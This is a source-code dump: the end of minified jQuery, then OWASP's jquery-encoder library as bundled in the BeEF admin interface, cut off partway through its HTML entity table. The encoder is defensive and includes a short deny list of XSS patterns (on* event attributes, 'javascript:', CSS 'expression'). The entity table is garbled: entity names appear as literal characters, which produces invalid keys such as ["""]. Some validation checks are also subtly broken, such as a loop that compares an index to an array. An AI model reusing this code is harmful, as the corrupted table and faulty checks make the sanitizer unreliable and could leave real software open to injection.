t||(h.createHTMLDocument?((i=(t=r.implementation.createHTMLDocument("")).createElement("base")).href=r.location.href,t.head.appendChild(i)):t=r),o=A.exec(e),a=!n&&[],o?[t.createElement(o[1])]:(o=xe([e],t,a),a&&a.length&&w(a).remove(),w.merge([],o.childNodes))},w.fn.load=function(e,t,n){var r,i,o,a=this,s=e.indexOf(" ");return s>-1&&(r=vt(e.slice(s)),e=e.slice(0,s)),g(t)?(n=t,t=void 0):t&&"object"==typeof t&&(i="POST"),a.length>0&&w.ajax({url:e,type:i||"GET",dataType:"html",data:t}).done(function(e){o=arguments,a.html(r?w("<div>").append(w.parseHTML(e)).find(r):e)}).always(n&&function(e,t){a.each(function(){n.apply(this,o||[e.responseText,t,e])})}),this},w.each(["ajaxStart","ajaxStop","ajaxComplete","ajaxError","ajaxSuccess","ajaxSend"],function(e,t){w.fn[t]=function(e){return this.on(t,e)}}),w.expr.pseudos.animated=function(e){return w.grep(w.timers,function(t){return e===t.elem}).length},w.offset={setOffset:function(e,t,n){var r,i,o,a,s,u,l,c=w.css(e,"position"),f=w(e),p={};"static"===c&&(e.style.position="relative"),s=f.offset(),o=w.css(e,"top"),u=w.css(e,"left"),(l=("absolute"===c||"fixed"===c)&&(o+u).indexOf("auto")>-1)?(a=(r=f.position()).top,i=r.left):(a=parseFloat(o)||0,i=parseFloat(u)||0),g(t)&&(t=t.call(e,n,w.extend({},s))),null!=t.top&&(p.top=t.top-s.top+a),null!=t.left&&(p.left=t.left-s.left+i),"using"in t?t.using.call(e,p):f.css(p)}},w.fn.extend({offset:function(e){if(arguments.length)return void 0===e?this:this.each(function(t){w.offset.setOffset(this,e,t)});var t,n,r=this[0];if(r)return r.getClientRects().length?(t=r.getBoundingClientRect(),n=r.ownerDocument.defaultView,{top:t.top+n.pageYOffset,left:t.left+n.pageXOffset}):{top:0,left:0}},position:function(){if(this[0]){var e,t,n,r=this[0],i={top:0,left:0};if("fixed"===w.css(r,"position"))t=r.getBoundingClientRect();else{t=this.offset(),n=r.ownerDocument,e=r.offsetParent||n.documentElement;while(e&&(e===n.body||e===n.documentElement)&&"static"===w.css(e,"position"))e=e.parentNode;e&&e!==r&&1===e.nodeType&&((i=w(e).offset()).top+=w.css(e,"borderTopWidth",!0),i.left+=w.css(e,"borderLeftWidth",!0))}return{top:t.top-i.top-w.css(r,"marginTop",!0),left:t.left-i.left-w.css(r,"marginLeft",!0)}}},offsetParent:function(){return this.map(function(){var e=this.offsetParent;while(e&&"static"===w.css(e,"position"))e=e.offsetParent;return e||be})}}),w.each({scrollLeft:"pageXOffset",scrollTop:"pageYOffset"},function(e,t){var n="pageYOffset"===t;w.fn[e]=function(r){return z(this,function(e,r,i){var o;if(y(e)?o=e:9===e.nodeType&&(o=e.defaultView),void 0===i)return o?o[t]:e[r];o?o.scrollTo(n?o.pageXOffset:i,n?i:o.pageYOffset):e[r]=i},e,r,arguments.length)}}),w.each(["top","left"],function(e,t){w.cssHooks[t]=_e(h.pixelPosition,function(e,n){if(n)return n=Fe(e,t),We.test(n)?w(e).position()[t]+"px":n})}),w.each({Height:"height",Width:"width"},function(e,t){w.each({padding:"inner"+e,content:t,"":"outer"+e},function(n,r){w.fn[r]=function(i,o){var a=arguments.length&&(n||"boolean"!=typeof i),s=n||(!0===i||!0===o?"margin":"border");return z(this,function(t,n,i){var o;return y(t)?0===r.indexOf("outer")?t["inner"+e]:t.document.documentElement["client"+e]:9===t.nodeType?(o=t.documentElement,Math.max(t.body["scroll"+e],o["scroll"+e],t.body["offset"+e],o["offset"+e],o["client"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each("blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu".split(" "),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,"**"):this.off(t,e||"**",n)}}),w.proxy=function(e,t){var n,r,i;if("string"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return("number"===t||"string"===t)&&!isNaN(e-parseFloat(e))},"function"==typeof define&&define.amd&&define("jquery",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w}); |
JavaScript | beef/extensions/admin_ui/media/javascript/esapi/jquery-encoder-0.1.0.js | /*
* Copyright (c) 2010 - The OWASP Foundation
*
* The jquery-encoder is published by OWASP under the MIT license. You should read and accept the
* LICENSE before you use, modify, and/or redistribute this software.
*/
(function($){var default_immune={'js':[',','.','_',' ']};var attr_whitelist_classes={'default':[',','.','-','_',' ']};var attr_whitelist={'width':['%'],'height':['%']};var css_whitelist_classes={'default':['-',' ','%'],'color':['#',' ','(',')'],'image':['(',')',':','/','?','&','-','.','"','=',' ']};var css_whitelist={'background':['(',')',':','%','/','?','&','-',' ','.','"','=','#'],'background-image':css_whitelist_classes['image'],'background-color':css_whitelist_classes['color'],'border-color':css_whitelist_classes['color'],'border-image':css_whitelist_classes['image'],'color':css_whitelist_classes['color'],'icon':css_whitelist_classes['image'],'list-style-image':css_whitelist_classes['image'],'outline-color':css_whitelist_classes['color']};var unsafeKeys={'attr_name':['on[a-z]{1,}','style','href','src'],'attr_val':['javascript:'],'css_key':['behavior','-moz-behavior','-ms-behavior'],'css_val':['expression']};var options={blacklist:true};var hasBeenInitialized=false;$.encoder={author:'Chris Schmidt ([email protected])',version:'${project.version}',init:function(opts){if(hasBeenInitialized)
throw"jQuery Encoder has already been initialized - cannot set options after initialization";hasBeenInitialized=true;$.extend(options,opts);},encodeForHTML:function(input){hasBeenInitialized=true;var div=document.createElement('div');$(div).text(input);return $(div).html();},encodeForHTMLAttribute:function(attr,input,omitAttributeName){hasBeenInitialized=true;attr=$.encoder.canonicalize(attr).toLowerCase();input=$.encoder.canonicalize(input);if($.inArray(attr,unsafeKeys['attr_name'])>=0){throw"Unsafe attribute name used: "+attr;}
for(var a=0;a<unsafeKeys['attr_val'];a++){if(input.toLowerCase().match(unsafeKeys['attr_val'][a])){throw"Unsafe attribute value used: "+input;}}
immune=attr_whitelist[attr];if(!immune)immune=attr_whitelist_classes['default'];var encoded='';if(!omitAttributeName){for(var p=0;p<attr.length;p++){var pc=attr.charAt(p);if(!pc.match(/[a-zA-Z\-0-9]/)){throw"Invalid attribute name specified";}
encoded+=pc;}
encoded+='="';}
for(var i=0;i<input.length;i++){var ch=input.charAt(i),cc=input.charCodeAt(i);if(!ch.match(/[a-zA-Z0-9]/)&&$.inArray(ch,immune)<0){var hex=cc.toString(16);encoded+='&#x'+hex+';';}else{encoded+=ch;}}
if(!omitAttributeName){encoded+='"';}
return encoded;},encodeForCSS:function(propName,input,omitPropertyName){hasBeenInitialized=true;propName=$.encoder.canonicalize(propName).toLowerCase();input=$.encoder.canonicalize(input);if($.inArray(propName,unsafeKeys['css_key'])>=0){throw"Unsafe property name used: "+propName;}
for(var a=0;a<unsafeKeys['css_val'].length;a++){if(input.toLowerCase().indexOf(unsafeKeys['css_val'][a])>=0){throw"Unsafe property value used: "+input;}}
immune=css_whitelist[propName];if(!immune)immune=css_whitelist_classes['default'];var encoded='';if(!omitPropertyName){for(var p=0;p<propName.length;p++){var pc=propName.charAt(p);if(!pc.match(/[a-zA-Z\-]/)){throw"Invalid Property Name specified";}
encoded+=pc;}
encoded+=': ';}
for(var i=0;i<input.length;i++){var ch=input.charAt(i),cc=input.charCodeAt(i);if(!ch.match(/[a-zA-Z0-9]/)&&$.inArray(ch,immune)<0){var hex=cc.toString(16);var pad='000000'.substr((hex.length));encoded+='\\'+pad+hex;}else{encoded+=ch;}}
return encoded;},encodeForURL:function(input,attr){hasBeenInitialized=true;var encoded='';if(attr){if(attr.match(/^[A-Za-z\-0-9]{1,}$/)){encoded+=$.encoder.canonicalize(attr).toLowerCase();}else{throw"Illegal Attribute Name Specified";}
encoded+='="';}
encoded+=encodeURIComponent(input);encoded+=attr?'"':'';return encoded;},encodeForJavascript:function(input){hasBeenInitialized=true;immune=default_immune['js'];var encoded='';for(var i=0;i<input.length;i++){var ch=input.charAt(i),cc=input.charCodeAt(i);if($.inArray(ch,immune)>=0||hex[cc]==null){encoded+=ch;continue;}
var temp=cc.toString(16),pad;if(cc<256){pad='00'.substr(temp.length);encoded+='\\x'+pad+temp.toUpperCase();}else{pad='0000'.substr(temp.length);encoded+='\\u'+pad+temp.toUpperCase();}}
return encoded;},canonicalize:function(input,strict){hasBeenInitialized=true;if(input===null)return null;var out=input,cycle_out=input;var decodeCount=0,cycles=0;var codecs=[new HTMLEntityCodec(),new PercentCodec(),new CSSCodec()];while(true){cycle_out=out;for(var i=0;i<codecs.length;i++){var new_out=codecs[i].decode(out);if(new_out!=out){decodeCount++;out=new_out;}}
if(cycle_out==out){break;}
cycles++;}
if(strict&&decodeCount>1){throw"Attack Detected - Multiple/Double Encodings used in input";}
return out;}};var hex=[];for(var c=0;c<0xFF;c++){if(c>=0x30&&c<=0x39||c>=0x41&&c<=0x5a||c>=0x61&&c<=0x7a){hex[c]=null;}else{hex[c]=c.toString(16);}}
var methods={html:function(opts){return $.encoder.encodeForHTML(opts.unsafe);},css:function(opts){var work=[];var out=[];if(opts.map){work=opts.map;}else{work[opts.name]=opts.unsafe;}
for(var k in work){if(!(typeof work[k]=='function')&&work.hasOwnProperty(k)){out[k]=$.encoder.encodeForCSS(k,work[k],true);}}
return out;},attr:function(opts){var work=[];var out=[];if(opts.map){work=opts.map;}else{work[opts.name]=opts.unsafe;}
for(var k in work){if(!(typeof work[k]=='function')&&work.hasOwnProperty(k)){out[k]=$.encoder.encodeForHTMLAttribute(k,work[k],true);}}
return out;}};$.fn.encode=function(){hasBeenInitialized=true;var argCount=arguments.length;var opts={'context':'html','unsafe':null,'name':null,'map':null,'setter':null,'strict':true};if(argCount==1&&typeof arguments[0]=='object'){$.extend(opts,arguments[0]);}else{opts.context=arguments[0];if(arguments.length==2){if(opts.context=='html'){opts.unsafe=arguments[1];}
else if(opts.content=='attr'||opts.content=='css'){opts.map=arguments[1];}}else{opts.name=arguments[1];opts.unsafe=arguments[2];}}
if(opts.context=='html'){opts.setter=this.html;}
else if(opts.context=='css'){opts.setter=this.css;}
else if(opts.context=='attr'){opts.setter=this.attr;}
return opts.setter.call(this,methods[opts.context].call(this,opts));};var PushbackString=Class.extend({_input:null,_pushback:null,_temp:null,_index:0,_mark:0,_hasNext:function(){if(this._input==null)return false;if(this._input.length==0)return false;return this._index<this._input.length;},init:function(input){this._input=input;},pushback:function(c){this._pushback=c;},index:function(){return this._index;},hasNext:function(){if(this._pushback!=null)return true;return this._hasNext();},next:function(){if(this._pushback!=null){var save=this._pushback;this._pushback=null;return save;}
return(this._hasNext())?this._input.charAt(this._index++):null;},nextHex:function(){var c=this.next();if(c==null)return null;if(c.match(/[0-9A-Fa-f]/))return c;return null;},peek:function(c){if(c){if(this._pushback&&this._pushback==c)return true;return this._hasNext()?this._input.charAt(this._index)==c:false;}
if(this._pushback)return this._pushback;return this._hasNext()?this._input.charAt(this._index):null;},mark:function(){this._temp=this._pushback;this._mark=this._index;},reset:function(){this._pushback=this._temp;this._index=this._mark;},remainder:function(){var out=this._input.substr(this._index);if(this._pushback!=null){out=this._pushback+out;}
return out;}});var Codec=Class.extend({decode:function(input){var out='',pbs=new PushbackString(input);while(pbs.hasNext()){var c=this.decodeCharacter(pbs);if(c!=null){out+=c;}else{out+=pbs.next();}}
return out;},decodeCharacter:function(pbs){return pbs.next();}});var HTMLEntityCodec=Codec.extend({decodeCharacter:function(input){input.mark();var first=input.next();if(first==null||first!='&'){input.reset();return null;}
var second=input.next();if(second==null){input.reset();return null;}
var c;if(second=='#'){c=this._getNumericEntity(input);if(c!=null)return c;}else if(second.match(/[A-Za-z]/)){input.pushback(second);c=this._getNamedEntity(input);if(c!=null)return c;}
input.reset();return null;},_getNamedEntity:function(input){var possible='',entry,len;len=Math.min(input.remainder().length,ENTITY_TO_CHAR_TRIE.getMaxKeyLength());for(var i=0;i<len;i++){possible+=input.next().toLowerCase();}
entry=ENTITY_TO_CHAR_TRIE.getLongestMatch(possible);if(entry==null)
return null;input.reset();input.next();len=entry.getKey().length;for(var j=0;j<len;j++){input.next();}
if(input.peek(';'))
input.next();return entry.getValue();},_getNumericEntity:function(input){var first=input.peek();if(first==null)return null;if(first=='x'||first=='X'){input.next();return this._parseHex(input);}
return this._parseNumber(input);},_parseHex:function(input){var out='';while(input.hasNext()){var c=input.peek();if(!isNaN(parseInt(c,16))){out+=c;input.next();}else if(c==';'){input.next();break;}else{break;}}
var i=parseInt(out,16);if(!isNaN(i)&&isValidCodePoint(i))return String.fromCharCode(i);return null;},_parseNumber:function(input){var out='';while(input.hasNext()){var ch=input.peek();if(!isNaN(parseInt(ch,10))){out+=ch;input.next();}else if(ch==';'){input.next();break;}else{break;}}
var i=parseInt(out,10);if(!isNaN(i)&&isValidCodePoint(i))return String.fromCharCode(i);return null;}});var PercentCodec=Codec.extend({decodeCharacter:function(input){input.mark();var first=input.next();if(first==null){input.reset();return null;}
if(first!='%'){input.reset();return null;}
var out='';for(var i=0;i<2;i++){var c=input.nextHex();if(c!=null)out+=c;}
if(out.length==2){var p=parseInt(out,16);if(isValidCodePoint(p))
return String.fromCharCode(p);}
input.reset();return null;}});var CSSCodec=Codec.extend({decodeCharacter:function(input){input.mark();var first=input.next();if(first==null||first!='\\'){input.reset();return null;}
var second=input.next();if(second==null){input.reset();return null;}
switch(second){case'\r':if(input.peek('\n')){input.next();}
case'\n':case'\f':case'\u0000':return this.decodeCharacter(input);}
if(parseInt(second,16)=='NaN'){return second;}
var out=second;for(var j=0;j<5;j++){var c=input.next();if(c==null||isWhiteSpace(c)){break;}
if(parseInt(c,16)!='NaN'){out+=c;}else{input.pushback(c);break;}}
var p=parseInt(out,16);if(isValidCodePoint(p))
return String.fromCharCode(p);return'\ufffd';}});var Trie=Class.extend({root:null,maxKeyLen:0,size:0,init:function(){this.clear();},getLongestMatch:function(key){return(this.root==null&&key==null)?null:this.root.getLongestMatch(key,0);},getMaxKeyLength:function(){return this.maxKeyLen;},clear:function(){this.root=null,this.maxKeyLen=0,this.size=0;},put:function(key,val){var len,old;if(this.root==null)
this.root=new Trie.Node();if((old=this.root.put(key,0,val))!=null)
return old;if((len=key.length)>this.maxKeyLen)
this.maxKeyLen=key.length;this.size++;return null;}});Trie.Entry=Class.extend({_key:null,_value:null,init:function(key,value){this._key=key,this._value=value;},getKey:function(){return this._key;},getValue:function(){return this._value;},equals:function(other){if(!(other instanceof Trie.Entry)){return false;}
return this._key==other._key&&this._value==other._value;}});Trie.Node=Class.extend({_value:null,_nextMap:null,setValue:function(value){this._value=value;},getNextNode:function(ch){if(!this._nextMap)return null;return this._nextMap[ch];},put:function(key,pos,value){var nextNode,ch,old;if(key.length==pos){old=this._value;this.setValue(value);return old;}
ch=key.charAt(pos);if(this._nextMap==null){this._nextMap=Trie.Node.newNodeMap();nextNode=new Trie.Node();this._nextMap[ch]=nextNode;}else if((nextNode=this._nextMap[ch])==null){nextNode=new Trie.Node();this._nextMap[ch]=nextNode;}
return nextNode.put(key,pos+1,value);},get:function(key,pos){var nextNode;if(key.length<=pos)
return this._value;if((nextNode=this.getNextNode(key.charAt(pos)))==null)
return null;return nextNode.get(key,pos+1);},getLongestMatch:function(key,pos){var nextNode,ret;if(key.length<=pos){return Trie.Entry.newInstanceIfNeeded(key,this._value);}
if((nextNode=this.getNextNode(key.charAt(pos)))==null){return Trie.Entry.newInstanceIfNeeded(key,pos,this._value);}
if((ret=nextNode.getLongestMatch(key,pos+1))!=null){return ret;}
return Trie.Entry.newInstanceIfNeeded(key,pos,this._value);}});Trie.Entry.newInstanceIfNeeded=function(){var key=arguments[0],value,keyLength;if(typeof arguments[1]=='string'){value=arguments[1];keyLength=key.length;}else{keyLength=arguments[1];value=arguments[2];}
if(value==null||key==null){return null;}
if(key.length>keyLength){key=key.substr(0,keyLength);}
return new Trie.Entry(key,value);};Trie.Node.newNodeMap=function(){return{};};var isValidCodePoint=function(codepoint){return codepoint>=0x0000&&codepoint<=0x10FFFF;};var isWhiteSpace=function(input){return input.match(/[\s]/);};var MAP_ENTITY_TO_CHAR=[];var MAP_CHAR_TO_ENTITY=[];var ENTITY_TO_CHAR_TRIE=new Trie();(function(){MAP_ENTITY_TO_CHAR["""]="34";MAP_ENTITY_TO_CHAR["&"]="38";MAP_ENTITY_TO_CHAR["<"]="60";MAP_ENTITY_TO_CHAR[">"]="62";MAP_ENTITY_TO_CHAR[" "]="160";MAP_ENTITY_TO_CHAR["¡"]="161";MAP_ENTITY_TO_CHAR["¢"]="162";MAP_ENTITY_TO_CHAR["£"]="163";MAP_ENTITY_TO_CHAR["¤"]="164";MAP_ENTITY_TO_CHAR["¥"]="165";MAP_ENTITY_TO_CHAR["¦"]="166";MAP_ENTITY_TO_CHAR["§"]="167";MAP_ENTITY_TO_CHAR["¨"]="168";MAP_ENTITY_TO_CHAR["©"]="169";MAP_ENTITY_TO_CHAR["ª"]="170";MAP_ENTITY_TO_CHAR["«"]="171";MAP_ENTITY_TO_CHAR["¬"]="172";MAP_ENTITY_TO_CHAR["­"]="173";MAP_ENTITY_TO_CHAR["®"]="174";MAP_ENTITY_TO_CHAR["¯"]="175";MAP_ENTITY_TO_CHAR["°"]="176";MAP_ENTITY_TO_CHAR["±"]="177";MAP_ENTITY_TO_CHAR["²"]="178";MAP_ENTITY_TO_CHAR["³"]="179";MAP_ENTITY_TO_CHAR["´"]="180";MAP_ENTITY_TO_CHAR["µ"]="181";MAP_ENTITY_TO_CHAR["¶"]="182";MAP_ENTITY_TO_CHAR["·"]="183";MAP_ENTITY_TO_CHAR["¸"]="184";MAP_ENTITY_TO_CHAR["¹"]="185";MAP_ENTITY_TO_CHAR["º"]="186";MAP_ENTITY_TO_CHAR["»"]="187";MAP_ENTITY_TO_CHAR["¼"]="188";MAP_ENTITY_TO_CHAR["½"]="189";MAP_ENTITY_TO_CHAR["¾"]="190";MAP_ENTITY_TO_CHAR["¿"]="191";MAP_ENTITY_TO_CHAR["À"]="192";MAP_ENTITY_TO_CHAR["Á"]="193";MAP_ENTITY_TO_CHAR["Â"]="194";MAP_ENTITY_TO_CHAR["Ã"]="195";MAP_ENTITY_TO_CHAR["Ä"]="196";MAP_ENTITY_TO_CHAR["Å"]="197";MAP_ENTITY_TO_CHAR["Æ"]="198";MAP_ENTITY_TO_CHAR["Ç"]="199";MAP_ENTITY_TO_CHAR["È"]="200";MAP_ENTITY_TO_CHAR["É"]="201";MAP_ENTITY_TO_CHAR["Ê"]="202";MAP_ENTITY_TO_CHAR["Ë"]="203";MAP_ENTITY_TO_CHAR["Ì"]="204";MAP_ENTITY_TO_CHAR["Í"]="205";MAP_ENTITY_TO_CHAR["Î"]="206";MAP_ENTITY_TO_CHAR["Ï"]="207";MAP_ENTITY_TO_CHAR["Ð"]="208";MAP_ENTITY_TO_CHAR["Ñ"]="209";MAP_ENTITY_TO_CHAR["Ò"]="210";MAP_ENTITY_TO_CHAR["Ó"]="211";MAP_ENTITY_TO_CHAR["Ô"]="212";MAP_ENTITY_TO_CHAR["Õ"]="213";MAP_ENTITY_TO_CHAR["Ö"]="214";MAP_ENTITY_TO_CHAR["×"]="215";MAP_ENTITY_TO_CHAR["Ø"]="216";MAP_ENTITY_TO_CHAR["Ù"]="217";MAP_ENTITY_TO_CHAR["Ú"]="218";MAP_ENTITY_TO_CHAR["Û"]="219";MAP_ENTITY_TO_CHAR["Ü"]="220";MAP_ENTITY_TO_CHAR["Ý"]="221";MAP_ENTITY_TO_CHAR["Þ"]="222";MAP_ENTITY_TO_CHAR["ß"]="223";MAP_ENTITY_TO_CHAR["à"]="224";MAP_ENTITY_TO_CHAR["á"]="225";MAP_ENTITY_TO_CHAR["â"]="226";MAP_ENTITY_TO_CHAR["ã"]="227";MAP_ENTITY_TO_CHAR["ä"]="228";MAP_ENTITY_TO_CHAR["å"]="229";MAP_ENTITY_TO_CHAR["æ"]="230";MAP_ENTITY_TO_CHAR["ç"]="231";MAP_ENTITY_TO_CHAR["è"]="232";MAP_ENTITY_TO_CHAR["é"]="233";MAP_ENTITY_TO_CHAR["ê"]="234";MAP_ENTITY_TO_CHAR["ë"]="235";MAP_ENTITY_TO_CHAR["ì"]="236";MAP_ENTITY_TO_CHAR["í"]="237";MAP_ENTITY_TO_CHAR["î"]="238";MAP_ENTITY_TO_CHAR["ï"]="239";MAP_ENTITY_TO_CHAR["ð"]="240";MAP_ENTITY_TO_CHAR["ñ"]="241";MAP_ENTITY_TO_CHAR["ò"]="242";MAP_ENTITY_TO_CHAR["ó"]="243";MAP_ENTITY_TO_CHAR["ô"]="244";MAP_ENTITY_TO_CHAR["õ"]="245";MAP_ENTITY_TO_CHAR["ö"]="246";MAP_ENTITY_TO_CHAR["÷"]="247";MAP_ENTITY_TO_CHAR["ø"]="248";MAP_ENTITY_TO_CHAR["ù"]="249";MAP_ENTITY_TO_CHAR["ú"]="250";MAP_ENTITY_TO_CHAR["û"]="251";MAP_ENTITY_TO_CHAR["ü"]="252";MAP_ENTITY_TO_CHAR["ý"]="253";MAP_ENTITY_TO_CHAR["þ"]="254";MAP_ENTITY_TO_CHAR["ÿ"]="255";MAP_ENTITY_TO_CHAR["&OElig"]="338";MAP_ENTITY_TO_CHAR["&oelig"]="339";MAP_ENTITY_TO_CHAR["&Scaron"]="352";MAP_ENTITY_TO_CHAR["&scaron"]="353";MAP_ENTITY_TO_CHAR["&Yuml"]="376";MAP_ENTITY_TO_CHAR["&fnof"]="402";MAP_ENTITY_TO_CHAR["&circ"]="710";MAP_ENTITY_TO_CHAR["&tilde"]="732";MAP_ENTITY_TO_CHAR["&Alpha"]="913";MAP_ENTITY_TO_CHAR["&Beta"]="914";MAP_ENTITY_TO_CHAR["&Gamma"]="915";MAP_ENTITY_TO_CHAR["&Delta"]="916";MAP_ENTITY_TO_CHAR["&Epsilon"]="917";MAP_ENTITY_TO_CHAR["&Zeta"]="918";MAP_ENTITY_TO_CHAR["&Eta"]="919";MAP_ENTITY_TO_CHAR["&Theta"]="920";MAP_ENTITY_TO_CHAR["&Iota"]="921";MAP_ENTITY_TO_CHAR["&Kappa"]="922";MAP_ENTITY_TO_CHAR["&Lambda"]="923";MAP_ENTITY_TO_CHAR["&Mu"]="924";MAP_ENTITY_TO_CHAR["&Nu"]="925";MAP_ENTITY_TO_CHAR["&Xi"]="926";MAP_ENTITY_TO_CHAR["&Omicron"]="927";MAP_ENTITY_TO_CHAR["&Pi"]="928";MAP_ENTITY_TO_CHAR["&Rho"]="929";MAP_ENTITY_TO_CHAR["&Sigma"]="931";MAP_ENTITY_TO_CHAR["&Tau"]="932";MAP_ENTITY_TO_CHAR["&Upsilon"]="933";MAP_ENTITY_TO_CHAR["&Phi"]="934";MAP_ENTITY_TO_CHAR["&Chi"]="935";MAP_ENTITY_TO_CHAR["&Psi"]="936";MAP_ENTITY_TO_CHAR["&Omega"]="937";MAP_ENTITY_TO_CHAR["&alpha"]="945";MAP_ENTITY_TO_CHAR["&beta"]="946";MAP_ENTITY_TO_CHAR["&gamma"]="947";MAP_ENTITY_TO_CHAR["&delta"]="948";MAP_ENTITY_TO_CHAR["&epsilon"]="949";MAP_ENTITY_TO_CHAR["&zeta"]="950";MAP_ENTITY_TO_CHAR["&eta"]="951";MAP_ENTITY_TO_CHAR["&theta"]="952";MAP_ENTITY_TO_CHAR["&iota"]="953";MAP_ENTITY_TO_CHAR["&kappa"]="954";MAP_ENTITY_TO_CHAR["&lambda"]="955";MAP_ENTITY_TO_CHAR["&mu"]="956";MAP_ENTITY_TO_CHAR["&nu"]="957";MAP_ENTITY_TO_CHAR["&xi"]="958";MAP_ENTITY_TO_CHAR["&omicron"]="959";MAP_ENTITY_TO_CHAR["&pi"]="960";MAP_ENTITY_TO_CHAR["&rho"]="961";MAP_ENTITY_TO_CHAR["&sigmaf"]="962";MAP_ENTITY_TO_CHAR["&sigma"]="963";MAP_ENTITY_TO_CHAR["&tau"]="964";MAP_ENTITY_TO_CHAR["&upsilon"]="965";MAP_ENTITY_TO_CHAR["&phi"]="966";MAP_ENTITY_TO_CHAR["&chi"]="967";MAP_ENTITY_TO_CHAR["&psi"]="968";MAP_ENTITY_TO_CHAR["&omega"]="969";MAP_ENTITY_TO_CHAR["&thetasym"]="977";MAP_ENTITY_TO_CHAR["&upsih"]="978";MAP_ENTITY_TO_CHAR["&piv"]="982";MAP_ENTITY_TO_CHAR["&ensp"]="8194";MAP_ENTITY_TO_CHAR["&emsp"]="8195";MAP_ENTITY_TO_CHAR["&thinsp"]="8201";MAP_ENTITY_TO_CHAR["&zwnj"]="8204";MAP_ENTITY_TO_CHAR["&zwj"]="8205";MAP_ENTITY_TO_CHAR["&lrm"]="8206";MAP_ENTITY_TO_CHAR["&rlm"]="8207";MAP_ENTITY_TO_CHAR["&ndash"]="8211";MAP_ENTITY_TO_CHAR["&mdash"]="8212";MAP_ENTITY_TO_CHAR["&lsquo"]="8216";MAP_ENTITY_TO_CHAR["&rsquo"]="8217";MAP_ENTITY_TO_CHAR["&sbquo"]="8218";MAP_ENTITY_TO_CHAR["&ldquo"]="8220";MAP_ENTITY_TO_CHAR["&rdquo"]="8221";MAP_ENTITY_TO_CHAR["&bdquo"]="8222";MAP_ENTITY_TO_CHAR["&dagger"]="8224";MAP_ENTITY_TO_CHAR["&Dagger"]="8225";MAP_ENTITY_TO_CHAR["&bull"]="8226";MAP_ENTITY_TO_CHAR["&hellip"]="8230";MAP_ENTITY_TO_CHAR["&permil"]="8240";MAP_ENTITY_TO_CHAR["&prime"]="8242";MAP_ENTITY_TO_CHAR["&Prime"]="8243";MAP_ENTITY_TO_CHAR["&lsaquo"]="8249";MAP_ENTITY_TO_CHAR["&rsaquo"]="8250";MAP_ENTITY_TO_CHAR["&oline"]="8254";MAP_ENTITY_TO_CHAR["&frasl"]="8260";MAP_ENTITY_TO_CHAR["&euro"]="8364";MAP_ENTITY_TO_CHAR["&image"]="8365";MAP_ENTITY_TO_CHAR["&weierp"]="8472";MAP_ENTITY_TO_CHAR["&real"]="8476";MAP_ENTITY_TO_CHAR["&trade"]="8482";MAP_ENTITY_TO_CHAR["&alefsym"]="8501";MAP_ENTITY_TO_CHAR["&larr"]="8592";MAP_ENTITY_TO_CHAR["&uarr"]="8593";MAP_ENTITY_TO_CHAR["&rarr"]="8594";MAP_ENTITY_TO_CHAR["&darr"]="8595";MAP_ENTITY_TO_CHAR["&harr"]="8596";MAP_ENTITY_TO_CHAR["&crarr"]="8629";MAP_ENTITY_TO_CHAR["&lArr"]="8656";MAP_ENTITY_TO_CHAR["&uArr"]="8657";MAP_ENTITY_TO_CHAR["&rArr"]="8658";MAP_ENTITY_TO_CHAR["&dArr"]="8659";MAP_ENTITY_TO_CHAR["&hArr"]="8660";MAP_ENTITY_TO_CHAR["&forall"]="8704";MAP_ENTITY_TO_CHAR["&part"]="8706";MAP_ENTITY_TO_CHAR["&exist"]="8707";MAP_ENTITY_TO_CHAR["&empty"]="8709";MAP_ENTITY_TO_CHAR["&nabla"]="8711";MAP_ENTITY_TO_CHAR["&isin"]="8712";MAP_ENTITY_TO_CHAR["¬in"]="8713";MAP_ENTITY_TO_CHAR["&ni"]="8715";MAP_ENTITY_TO_CHAR["&prod"]="8719";MAP_ENTITY_TO_CHAR["&sum"]="8721";MAP_ENTITY_TO_CHAR["&minus"]="8722";MAP_ENTITY_TO_CHAR["&lowast"]="8727";MAP_ENTITY_TO_CHAR["&radic"]="8730";MAP_ENTITY_TO_CHAR["&prop"]="8733";MAP_ENTITY_TO_CHAR["&infin"]="8734";MAP_ENTITY_TO_CHAR["&ang"]="8736";MAP_ENTITY_TO_CHAR["&and"]="8743";MAP_ENTITY_TO_CHAR["&or"]="8744";MAP_ENTITY_TO_CHAR["&cap"]="8745";MAP_ENTITY_TO_CHAR["&cup"]="8746";MAP_ENTITY_TO_CHAR["&int"]="8747";MAP_ENTITY_TO_CHAR["&there4"]="8756";MAP_ENTITY_TO_CHAR["&sim"]="8764";MAP_ENTITY_TO_CHAR["&cong"]="8773";MAP_ENTITY_TO_CHAR["&asymp"]="8776";MAP_ENTITY_TO_CHAR["&ne"]="8800";MAP_ENTITY_TO_CHAR["&equiv"]="8801";MAP_ENTITY_TO_CHAR["&le"]="8804";MAP_ENTITY_TO_CHAR["&ge"]="8805";MAP_ENTITY_TO_CHAR["&sub"]="8834";MAP_ENTITY_TO_CHAR["&sup"]="8835";MAP_ENTITY_TO_CHAR["&nsub"]="8836";MAP_ENTITY_TO_CHAR["&sube"]="8838";MAP_ENTITY_TO_CHAR["&supe"]="8839";MAP_ENTITY_TO_CHAR["&oplus"]="8853";MAP_ENTITY_TO_CHAR["&otimes"]="8855";MAP_ENTITY_TO_CHAR["&perp"]="8869";MAP_ENTITY_TO_CHAR["&sdot"]="8901";MAP_ENTITY_TO_CHAR["&lceil